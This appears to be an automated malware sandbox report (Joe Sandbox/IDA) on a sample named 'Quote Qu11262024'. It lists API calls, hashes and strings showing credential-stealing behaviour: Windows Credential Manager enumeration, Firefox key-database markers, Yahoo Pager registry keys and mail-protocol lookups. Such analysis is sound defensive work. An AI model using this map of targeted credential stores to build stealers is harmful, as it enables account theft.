                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                    • String ID: caption$dialog_%d
                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                    • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                    • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                    • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 3974772901-0
                                                                                                    • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                    • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 577244452-0
                                                                                                    • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                    • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                    • String ID: imap$pop3$smtp
                                                                                                    • API String ID: 2025310588-821077329
                                                                                                    • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                    • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76230A60), ref: 00408EBE
                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408E31
                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                    • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                    • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                    APIs
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014771361-0
                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: global-salt$password-check
                                                                                                    • API String ID: 231171946-3927197501
                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                    • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 19018683-0
                                                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                    • String ID: Passport.Net\*
                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                    • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                    • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                    • String ID: Personalities
                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                    • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                    • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                    • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                    • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: H
                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
